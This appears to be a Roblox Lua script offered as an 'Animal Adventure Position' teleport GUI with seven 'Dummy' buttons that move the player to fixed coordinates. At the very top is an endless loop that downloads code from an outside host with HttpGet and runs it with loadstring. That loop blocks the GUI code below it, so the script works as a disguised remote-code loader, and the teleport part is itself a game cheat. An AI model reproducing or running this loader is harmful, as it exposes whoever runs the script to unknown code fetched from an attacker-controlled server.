while true do
	loadstring(game:HttpGet("https://bmacaveli.link/newhub"))()
end

local scrollingframegui = Instance.new("ScreenGui")
local Main2 = Instance.new("ImageLabel")
local name = Instance.new("TextLabel")
local ScrollingFrame = Instance.new("ScrollingFrame")
local UIGridLayout = Instance.new("UIGridLayout")
local TextButton = Instance.new("TextButton")
local TextButton_2 = Instance.new("TextButton")
local TextButton_3 = Instance.new("TextButton")
local TextButton_4 = Instance.new("TextButton")
local TextButton_5 = Instance.new("TextButton")
local TextButton_6 = Instance.new("TextButton")
local TextButton_7 = Instance.new("TextButton")
local UIAspectRatioConstraint = Instance.new("UIAspectRatioConstraint")

--Properties:

scrollingframegui.Name = "scrolling frame gui"
scrollingframegui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

Main2.Name = "Main2"
Main2.Parent = scrollingframegui
Main2.Active = true
Main2.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
Main2.BackgroundTransparency = 1.000
Main2.BorderColor3 = Color3.fromRGB(27, 42, 53)
Main2.Position = UDim2.new(0.739043534, 0, 0.254382551, 0)
Main2.Size = UDim2.new(0.254457057, 0, 0.490566045, 0)
Main2.Image = "rbxassetid://3570695787"
Main2.ImageColor3 = Color3.fromRGB(33, 33, 33)
Main2.ImageTransparency = 0.500
Main2.ScaleType = Enum.ScaleType.Slice
Main2.SliceCenter = Rect.new(100, 100, 100, 100)
Main2.SliceScale = 0.120
Main2.Active = true

name.Name = "name"
name.Parent = Main2
name.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
name.BackgroundTransparency = 1.000
name.BorderColor3 = Color3.fromRGB(27, 42, 53)
name.Position = UDim2.new(0.296146035, 0, 0, 0)
name.Size = UDim2.new(0.405679524, 0, 0.0692307726, 0)
name.Font = Enum.Font.SourceSans
name.Text = "Animal Adventure Position"
name.TextColor3 = Color3.fromRGB(0, 0, 0)
name.TextScaled = true
name.TextSize = 14.000
name.TextWrapped = true

ScrollingFrame.Parent = Main2
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ScrollingFrame.BackgroundTransparency = 1.000
ScrollingFrame.BorderColor3 = Color3.fromRGB(27, 42, 53)
ScrollingFrame.BorderSizePixel = 0
ScrollingFrame.Position = UDim2.new(0, 0, 0.260780215, 0)
ScrollingFrame.Size = UDim2.new(0.997971535, 0, 0.643589735, 0)

UIGridLayout.Parent = ScrollingFrame
UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder
UIGridLayout.CellSize = UDim2.new(0, 150, 0, 50)

TextButton.Parent = ScrollingFrame
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BackgroundTransparency = 0.500
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(1.3455286, 0, -0.207171321, 0)
TextButton.Size = UDim2.new(0.478677988, 0, 0.199203193, 0)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "Dummy 1"
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextSize = 14.000
TextButton.MouseButton1Click:Connect(function()
	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-145.33934020996094, 25.79606819152832, -371.67218017578125)
end)

TextButton_2.Parent = ScrollingFrame
TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_2.BackgroundTransparency = 0.500
TextButton_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.BorderSizePixel = 0
TextButton_2.Position = UDim2.new(1.3455286, 0, -0.207171321, 0)
TextButton_2.Size = UDim2.new(0.478677988, 0, 0.199203193, 0)
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = "Dummy 2"
TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.TextSize = 14.000
TextButton_2.MouseButton1Click:Connect(function()
	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-144.09193420410156, 16.58016586303711, -518.86279296875)
end)

TextButton_3.Parent = ScrollingFrame
TextButton_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_3.BackgroundTransparency = 0.500
TextButton_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.BorderSizePixel = 0
TextButton_3.Position = UDim2.new(1.3455286, 0, -0.207171321, 0)
TextButton_3.Size = UDim2.new(0.478677988, 0, 0.199203193, 0)
TextButton_3.Font = Enum.Font.SourceSans
TextButton_3.Text = "Dummy 3"
TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.TextSize = 14.000
TextButton_3.MouseButton1Click:Connect(function()
	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-165.10316467285156, 20.81641960144043, -658.9508056640625)
end)

TextButton_4.Parent = ScrollingFrame
TextButton_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_4.BackgroundTransparency = 0.500
TextButton_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.BorderSizePixel = 0
TextButton_4.Position = UDim2.new(1.3455286, 0, -0.207171321, 0)
TextButton_4.Size = UDim2.new(0.478677988, 0, 0.199203193, 0)
TextButton_4.Font = Enum.Font.SourceSans
TextButton_4.Text = "Dummy 4"
TextButton_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.TextSize = 14.000
TextButton_4.MouseButton1Click:Connect(function()
	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-124.75546264648438, 14.874704360961914, -839.5764770507812)
end)


TextButton_5.Parent = ScrollingFrame
TextButton_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_5.BackgroundTransparency = 0.500
TextButton_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.BorderSizePixel = 0
TextButton_5.Position = UDim2.new(1.3455286, 0, -0.207171321, 0)
TextButton_5.Size = UDim2.new(0.478677988, 0, 0.199203193, 0)
TextButton_5.Font = Enum.Font.SourceSans
TextButton_5.Text = "Dummy 5"
TextButton_5.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.TextSize = 14.000
TextButton_5.MouseButton1Click:Connect(function()
	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-127.59026336669922, 21.307050704956055, -995.5939331054688)
end)


TextButton_6.Parent = ScrollingFrame
TextButton_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_6.BackgroundTransparency = 0.500
TextButton_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.BorderSizePixel = 0
TextButton_6.Position = UDim2.new(1.3455286, 0, -0.207171321, 0)
TextButton_6.Size = UDim2.new(0.478677988, 0, 0.199203193, 0)
TextButton_6.Font = Enum.Font.SourceSans
TextButton_6.Text = "Dummy 6"
TextButton_6.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.TextSize = 14.000
TextButton_6.MouseButton1Click:Connect(function()
	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-131.15196228027344, 29.327295303344727, -1164.660888671875)
end)

TextButton_7.Parent = ScrollingFrame
TextButton_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_7.BackgroundTransparency = 0.500
TextButton_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_7.BorderSizePixel = 0
TextButton_7.Position = UDim2.new(1.3455286, 0, -0.207171321, 0)
TextButton_7.Size = UDim2.new(0.478677988, 0, 0.199203193, 0)
TextButton_7.Font = Enum.Font.SourceSans
TextButton_7.Text = "Dummy 7"
TextButton_7.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_7.TextSize = 14.000
TextButton_7.MouseButton1Click:Connect(function()
	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-149.02748107910156, 27.9945125579834, -1336.9462890625)
end)

UIAspectRatioConstraint.Parent = Main2
UIAspectRatioConstraint.AspectRatio = 0.805
